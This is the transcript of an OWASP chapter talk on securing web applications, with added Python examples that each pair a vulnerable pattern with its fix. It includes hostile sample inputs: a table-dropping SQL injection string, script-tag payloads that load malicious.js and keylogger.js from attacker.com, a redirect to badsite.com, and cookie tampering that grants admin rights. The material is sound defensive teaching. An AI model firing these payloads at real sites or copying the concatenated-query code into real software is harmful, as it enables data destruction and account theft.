How to secure web applications
DESCRIPTION
I presented this presentation at the OWASP Hyderabad Oct 2012 meet. You can find more details at https://www.owasp.org/index.php/Hyderabad
TRANSCRIPT
"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards."
- Gene Spafford
SECURING WEB APPLICATIONS
A BIRD'S EYE VIEW
Hello Everyone
Imran Mohammed (@imran_naseem)
# Security Researcher # Null Hyd Moderator # OWASP Hyd Board Member
Do you know?
90% of companies got hacked last year
http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey
To name a few ...
60% got hacked twice
50% are unsure about this year
Myths of App Sec
Myth #1
We have a network firewall & WAF
Myth #2
We have SSL, hence we are secure
Myth #3
Testing team will handle security
Myth #4
Nobody will attack us, we are a small organization
"If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology."
- Bruce Schneier
Ten commandments of secure development
Input is evil, validate it
Validate input source, context, syntax and semantics of data, current and previous states
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James
Back-end: SELECT title,year FROM books WHERE author = 'James'
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James'; drop table books;--
Back-end: SELECT title,year FROM books WHERE author = 'James'; drop table books;-- '
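The two back-end queries above, run for real. This is an added Python/sqlite3 example, not code from the slides: the books table and its rows are constructed here, and the vulnerable search uses executescript() to model a driver that accepts stacked statements (Python's own sqlite3 refuses them in execute(), which is a driver quirk, not a fix). It also shows a single-statement payload that works even where stacked queries are blocked, and the parameterised query that stops both.

```python
import sqlite3

# Constructed sample rows standing in for the slide's bookstore database.
BOOKS = [
    ("Secure Coding", 2008, "James"),
    ("Threat Modeling", 2014, "Adam"),
]


def make_db():
    """Fresh in-memory database with the slide's books(title, year, author) table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE books (title TEXT, year INTEGER, author TEXT)")
    conn.executemany("INSERT INTO books VALUES (?, ?, ?)", BOOKS)
    conn.commit()
    return conn


def table_exists(conn, name):
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def search_vulnerable(conn, authorname):
    """Builds the SQL by string concatenation, exactly like the slide's back end."""
    sql = "SELECT title,year FROM books WHERE author = '" + authorname + "'"
    try:
        return conn.execute(sql).fetchall()
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        # Python's sqlite3 refuses stacked statements in execute(); many real
        # drivers (MySQL with multi-statements on, MSSQL) do not. executescript()
        # models such a driver, so the slide's "; drop table books;--" really runs.
        conn.executescript(sql)
        return []


def search_safe(conn, authorname):
    """Parameterised query: the value travels separately from the SQL text, so a
    quote or semicolon inside it can only ever be part of the string literal."""
    return conn.execute(
        "SELECT title,year FROM books WHERE author = ?", (authorname,)
    ).fetchall()


if __name__ == "__main__":
    stacked = "James'; drop table books;-- "
    conn = make_db()
    search_vulnerable(conn, stacked)
    print("vulnerable, stacked payload: books table still exists =", table_exists(conn, "books"))
    conn = make_db()
    print("vulnerable, ' OR '1'='1 payload returns:", search_vulnerable(conn, "x' OR '1'='1"))
    conn = make_db()
    print("safe, stacked payload returns:", search_safe(conn, stacked),
          "| books table still exists =", table_exists(conn, "books"))
```

The point of the second payload is that "our driver only runs one statement" is not a defence: `x' OR '1'='1` is a single statement and returns every row. Only separating data from code (the `?` placeholder) removes the class of bug.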
Cross Site Scripting
Functionality:
https://example.com/error.php?message=Sorry%2c+an+error+occurred
"Reflected" back to the client via webserver:
<p>Sorry, an error occurred.</p>
Any problem?
https://example.com/error.php?message=[can I change this?]
Cross Site Scripting
Attack users:
https://example.com/error.php?message=<script src="http://attacker.com/malicious.js"></script>
"Reflected" back to the client via webserver: <p><script src="http://attacker.com/malicious.js"></script>.</p>
More problems
https://example.com/error.php?message=<script src="http://attacker.com/keylogger.js"></script>
https://example.com/error.php?message=<script>document.location.href="http://badsite.com"</script>
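The reflection above, with the fix. This is an added Python example, not the slides' error.php: it parses the message parameter out of the URL, renders it the way the vulnerable page does, and then renders it with output encoding for the HTML element context, which is where the slide's value lands.

```python
import html
from urllib.parse import parse_qs, urlsplit


def message_from_url(url):
    """Pulls the 'message' query parameter out of a URL, decoding %xx and '+'."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("message", [""])[0]


def render_error_vulnerable(message):
    """Reflects the parameter straight into the page, as the slide's error.php does."""
    return "<p>" + message + ".</p>"


def render_error_safe(message):
    """HTML-encodes for the element-content context: '<', '>', '&' and quotes
    become entities, so the browser displays the text instead of parsing it."""
    return "<p>" + html.escape(message, quote=True) + ".</p>"


def contains_script(markup):
    """Crude check used below to show whether a <script> element survived."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    benign = "https://example.com/error.php?message=Sorry%2c+an+error+occurred"
    attack = ('https://example.com/error.php?message='
              '<script src="http://attacker.com/malicious.js"></script>')
    for url in (benign, attack):
        msg = message_from_url(url)
        print("vulnerable:", render_error_vulnerable(msg))
        print("safe:      ", render_error_safe(msg))
```

The encoding has to match the sink: html.escape() is right for text inside an element or a quoted attribute, but a value dropped inside a `<script>` block, an event handler, a CSS rule or a URL needs that context's encoding instead. That is the "context" part of "validate input source, context, syntax and semantics" above.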
POST /books/user1/search.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d
Host: www.example.com

q=sqli&hidden_field=20
Check this: the query parameter, the "hidden" form field, the cookie and every request header are all supplied by the client and can be edited before the request is sent. Each of them is input.
Use cryptographically strong algorithms
Cookie: lang=english; sessionid=aW1yYW4=
Cookie: lang=english; sessionid=cmFnaHU=
Base64 is not encryption
http://www.example.com/salary/view/8635f8ebae3017a5581dbeba572eb01a
MD5 is not good enough
Google it: an unsalted MD5 of a predictable value (a record id, a common password) can simply be looked up
Use SHA2 or better, with a salt
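The three slides above in code. This is an added Python example, not from the presentation: it decodes the two Base64 "session ids" shown earlier, recovers the input of an unsalted MD5 by lookup (the candidate list is constructed; the salary URL's actual hash is not reversed here), and then shows what to use instead: a CSPRNG session id that carries no user data, and a salted, iterated SHA-256 (PBKDF2-HMAC-SHA256) for password storage with a constant-time verify.

```python
import base64
import hashlib
import hmac
import os
import secrets

# Iteration count OWASP's Password Storage Cheat Sheet recommends for
# PBKDF2-HMAC-SHA256 (as of 2023).
PBKDF2_ITERATIONS = 600_000


def decode_base64_cookie(value):
    """Base64 is an encoding, not encryption: anyone holding the cookie can read it."""
    return base64.b64decode(value).decode()


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def md5_lookup(hex_digest, candidates):
    """Recovers the input of an unsalted MD5 by trying candidates, which is what
    a public hash lookup site does at scale. A numeric record id or a short
    password falls to this in milliseconds."""
    for candidate in candidates:
        if md5_hex(candidate) == hex_digest:
            return candidate
    return None


def new_session_id():
    """256 bits from the OS CSPRNG, URL-safe; there is nothing in it to decode."""
    return secrets.token_urlsafe(32)


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated SHA-256 (PBKDF2-HMAC-SHA256). The salt is random per
    password, so equal passwords hash differently and precomputed tables are
    useless; the iteration count makes every guess expensive for the attacker."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


if __name__ == "__main__":
    print(decode_base64_cookie("aW1yYW4="), decode_base64_cookie("cmFnaHU="))
    print("md5 lookup:", md5_lookup(md5_hex("8635"), (str(i) for i in range(10_000))))
    print("session id:", new_session_id())
    stored = hash_password("tiger")
    print(stored)
    print(verify_password("tiger", stored), verify_password("Tiger", stored))
```

Two caveats a practitioner will want: a session id must also be tied to server-side state (see the ADMIN cookie example further down), and plain salted SHA-2 in a single round is not enough for passwords, which is why the example iterates it; a purpose-built password hash (bcrypt, scrypt, Argon2) is the usual choice where available.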
Minimize attack surface
Use Least privilege
Keep security simple
Keep design as simple and small as possible. Complex design is difficult to understand and secure.
Provide Defense in depth
Fail safely
isAdmin = true;   // fails open: if codeWhichMayFail() throws, isAdmin is never reset
try {
    codeWhichMayFail();
    isAdmin = isUserInRole("Administrator");
}
catch (Exception ex) {
    log.write(ex.toString());   // exception swallowed; the caller still sees isAdmin == true
}
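The snippet above fails open: when codeWhichMayFail() throws, the exception is logged and isAdmin keeps its initial value of true. An added Python example (not from the slides; the role store and function names are hypothetical stand-ins for isUserInRole()) puts that bug next to the fail-closed form.

```python
import logging

log = logging.getLogger("authz")


class RoleLookupError(Exception):
    """Raised when the role store cannot be consulted (stand-in for codeWhichMayFail())."""


def is_user_in_role(user, role, directory):
    """Hypothetical role lookup; directory is a constructed {user: roles} map,
    or None to simulate an outage."""
    if directory is None:
        raise RoleLookupError("role store unavailable")
    return role in directory.get(user, ())


def is_admin_fail_open(user, directory):
    is_admin = True  # the slide's bug: the default is the most privileged state
    try:
        is_admin = is_user_in_role(user, "Administrator", directory)
    except Exception as ex:
        log.error("role lookup failed: %s", ex)  # logged, but the caller never learns
    return is_admin


def is_admin_fail_closed(user, directory):
    is_admin = False  # deny unless the check positively succeeds
    try:
        is_admin = is_user_in_role(user, "Administrator", directory)
    except Exception as ex:
        log.error("role lookup failed: %s", ex)
        is_admin = False  # explicit: any failure on the path to a decision denies
    return is_admin


if __name__ == "__main__":
    roles = {"alice": ("Administrator",), "bob": ()}  # constructed sample
    print("store up:  ", is_admin_fail_open("bob", roles), is_admin_fail_closed("bob", roles))
    print("store down:", is_admin_fail_open("bob", None), is_admin_fail_closed("bob", None))
```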
Avoid Security through obscurity
Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC
Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC
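The cookie pair above is a role flag that the client can flip; hiding it behind an unhelpful name does not change that. An added Python example (not from the slides; the SESSIONS dictionary is a constructed stand-in for a server-side session store) shows the flag being trusted next to the correct design, where the only thing the cookie carries is an opaque session id and the role is looked up on the server.

```python
import secrets
from http.cookies import SimpleCookie

# Constructed server-side session store: session id -> session data.
SESSIONS = {}


def login(username, is_admin):
    """Creates a server-side session and returns the opaque id to set as a cookie."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "admin": is_admin}
    return sid


def parse_cookie(header):
    cookie = SimpleCookie()
    cookie.load(header)
    return {name: morsel.value for name, morsel in cookie.items()}


def is_admin_obscure(cookie_header):
    """The slide's anti-pattern: the client says whether it is an admin."""
    return parse_cookie(cookie_header).get("ADMIN") == "yes"


def is_admin_server_side(cookie_header):
    """Only the session id is read from the client; the role comes from the store.
    An unknown or forged id simply resolves to no session."""
    sid = parse_cookie(cookie_header).get("sessionid")
    session = SESSIONS.get(sid)
    return bool(session and session["admin"])


if __name__ == "__main__":
    sid = login("imran", is_admin=False)
    tampered = "lang=english; ADMIN=yes; sessionid=" + sid
    print("obscure flag trusts the client:", is_admin_obscure(tampered))
    print("server-side lookup:            ", is_admin_server_side(tampered))
```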
Fix Security issues correctly
Use Secure defaults
Remember scott/tiger?
and admin/password (router's admin panel)
Don't reinvent the wheel
How to develop/fix the code securely?
Follow Secure SDLC
OWASP Development Guide
Educate Developers/Users
Use OWASP ESAPI
Typical OWASP ESAPI Example
Thanks !
Questions ?
Credits
All icons are taken from the Noun Project
OWASP Project related Images are taken from owasp.org